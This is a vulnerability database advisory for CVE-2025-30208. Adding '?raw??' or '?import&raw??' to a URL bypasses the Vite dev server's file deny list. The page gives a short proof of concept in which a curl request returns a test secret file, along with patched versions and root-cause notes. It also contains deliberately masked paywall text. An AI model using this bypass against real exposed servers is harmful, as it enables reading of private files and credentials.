5.3

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-30208

GHSA ID

GHSA-x574-m823-4x7w

EPSS Score

0.98741%

CWE

CWE-200

Published

3/25/2025

Updated

3/25/2025

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-30208

CVE-2025-30208:
Vite bypasses server.fs.deny when using ?raw??

Summary

The contents of arbitrary files can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?raw?? or ?import&raw?? to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as ? are removed in several places, but are not accounted for in query string regexes.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

(GitHub Advisory)

5.3

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-30208

GHSA ID

GHSA-x574-m823-4x7w

EPSS Score

0.98741%

CWE

CWE-200

Published

3/25/2025

Updated

3/25/2025

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
vite	npm	>= 6.2.0, < 6.2.3	6.2.3
vite	npm	>= 6.1.0, < 6.1.2	6.1.2
vite	npm	>= 6.0.0, < 6.0.12	6.0.12
vite	npm	>= 5.0.0, < 5.4.15	5.4.15
vite	npm	< 4.5.10	4.5.10

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The transformMiddleware function is identified as vulnerable because the patch directly modifies its logic to correctly handle URLs with trailing query separators, fixing the bypass of server.fs.deny.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry T** *ont*nts o* *r*itr*ry *il*s **n ** r*turn** to t** *rows*r. ### Imp**t Only *pps *xpli*itly *xposin* t** Vit* **v s*rv*r to t** n*twork (usin* `--*ost` or [`s*rv*r.*ost` *on*i* option](*ttps://vit*js.**v/*on*i*/s*rv*r-options.*tml#s*

Reasoning

T** `tr*ns*ormMi**l*w*r*` *un*tion is i**nti*i** *s vuln*r**l* ****us* t** p*t** *ir**tly mo*i*i*s its lo*i* to *orr**tly **n*l* URLs wit* tr*ilin* qu*ry s*p*r*tors, *ixin* t** *yp*ss o* `s*rv*r.*s.**ny`.

5.3

Basic Information

Concerned about an active attack path?

CVE-2025-30208: Vite bypasses server.fs.deny when using ?raw??

Summary

Impact

Details

PoC

5.3

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2025-30208:
Vite bypasses server.fs.deny when using ?raw??

Vulnerability Intelligence
Miggo AI